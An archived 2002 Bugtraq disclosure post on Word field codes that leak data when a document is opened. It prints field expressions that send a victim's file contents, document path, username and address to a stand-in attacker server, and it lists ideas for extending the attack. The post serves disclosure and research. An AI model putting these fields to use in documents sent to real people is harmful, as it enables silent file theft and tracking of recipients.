[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: More vulnerabilities (Re: Security side-effects of Word fields)
From: Alex Gantman <agantman () qualcomm ! com>
Date: 2002-09-19 21:57:01
[Download RAW message or body]
In-Reply-To: <20020826212322.1137.qmail@mail.securityfocus.com>
A lot of people have been complaining about the fact that Alice must coerce Bob into \
editing and returning the bugged document. In this feature-driven market the cries \
of the users have not fallen on deaf ears. There appears to be a way for Alice to \
steal files from Bob (and a few other things) and all Bob has to do is open the Word \
document that Alice has sent to him. He no longer needs to bother with editing, or \
printing, or sending the document back to Alice.
Richard Edwards brought up the fact that the {INCLUDEPICTURE} field, unlike the \
{INCLUDETEXT} field, accepts URLs and not just local file names. So, if Alice can \
get the {INCLUDEPICTURE} field to update automatically every time the document is \
opened (by using the \d switch, for example) it will trigger a message to be sent to \
a server of her choice. So, what can Alice do with it? She could, for example, get \
the absolute path of where Bob has saved the document as well as the contents of some \
other file on Bob's computer:
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { \
INCLUDETEXT "c:\\a.txt" } } \d }
She could also keep track of who is reading (or printing) the file she sent to Bob:
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { \
USERADDRESS } } \d }
There are some limitations to what Alice can do with this. Word limits the HTTP URLs \
to 256 characters ( I don't know what the limit for other URLs is). Also, the \
{USERNAME} and {USERADDRESS} fields do not update automatically when a document is \
opened on all versions of Word (but they do when the document is printed).
The proof-of-concept code above is just pseudocode. It does not include all the \
triggers necessary for the fields to update automatically. I am sure that the reader \
can easily combine this with my previous post to get things right. Testing out this \
vulnerability is a little more difficult for individual users because it requires \
access to a web server. So, if anyone out there wants to contribute a web site that \
simply displays its own logs, I will contribute a Word file with a fully functioning \
demonstration of the exploit that people can use to test this vulnerability.
I really don't have any time to spend on this at work, and I have already taken \
enough time from my wife and kid for this. So, I am dropping this as it stands now. \
For those interested in pursuing these issues further I have put together some \
exercises for the reader: 1) Other exploits of fields
a) {INCLUDEPICTURE} accepts many different types of URLs. I've only tested HTTP \
(and mailto to some extent). What happens when you use FTP, telnet, file, etc? b) \
It appears that the {INCLUDEPICTURE} field creates only a one-way channel from the \
victim to the attacker. Is it possible that some of the URLs will allow a 2-way \
channel? If the field can ever evaluate to a text response (as opposed to the \
picture), the response can be used as input to another field. c) Are there other \
ways of triggering the automatic updating of fields? d) How far can you go with \
fields? Alice can set ({SET}) and get ({REF}) variables, branch ({IF}), perform \
basic math ({=}), get user information ({USERNAME}, {USERADDRESS}), read files \
({INCLUDETEXT}, {INCLUDEPICTURE}), send messages over the network ({INCLUDEPICTURE}), \
and send commands to the printer ({PRINT}). 2) Are there other applications with \
similar vulnerabilities. 3) Has anyone seen an example of these exploits out in the \
wild (from before the original post to bugtraq)?
Microsoft was notified on 9/17/2002.
> From: Alex Gantman <agantman@qualcomm.com>
> To: bugtraq@securityfocus.com
> Subject: Security side-effects of Word fields
>
>
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic